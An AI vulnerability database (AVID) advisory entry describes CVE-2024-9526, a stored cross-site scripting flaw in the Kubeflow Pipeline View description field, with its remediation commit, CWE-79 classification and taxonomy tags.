We use cookies to improve your experience on our site.
AVID-2026-R1637
Description
Stored XSS in Kubeflow Pipeline View (CVE-2024-9526)
Details
There exists a stored XSS Vulnerability in Kubeflow Pipeline View web UI. The Kubeflow Web UI allows to create new pipelines. When creating a new pipeline, it is possible to add a description. The description field allows html tags, which are not filtered properly. Leading to a stored XSS. We recommend upgrading past commit 930c35f1c543998e60e8d648ce93185c9b5dbe8d
Reason for inclusion in AVID: CVE-2024-9526 describes a stored XSS vulnerability in Kubeflow Pipeline View UI, a component used in ML pipelines to build/deploy AI workflows. This is a software vulnerability in a component that participates in the AI software stack, i.e., a general-purpose AI supply chain element. The report provides clear CVE details and references (NVD, GitHub PR), establishing the vulnerability signal.
References
Affected or Relevant Artifacts
- Developer: Kubeflow
- Deployer: Kubeflow
- Artifact Details:
| Type | Name |
|---|---|
| System | Kubeflow Pipeline View |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CWE
| ID | Description |
|---|---|
| CWE-79 | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or ‘Cross-site Scripting’) |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2024-11-18
- Version: 0.3.3
- AVID Entry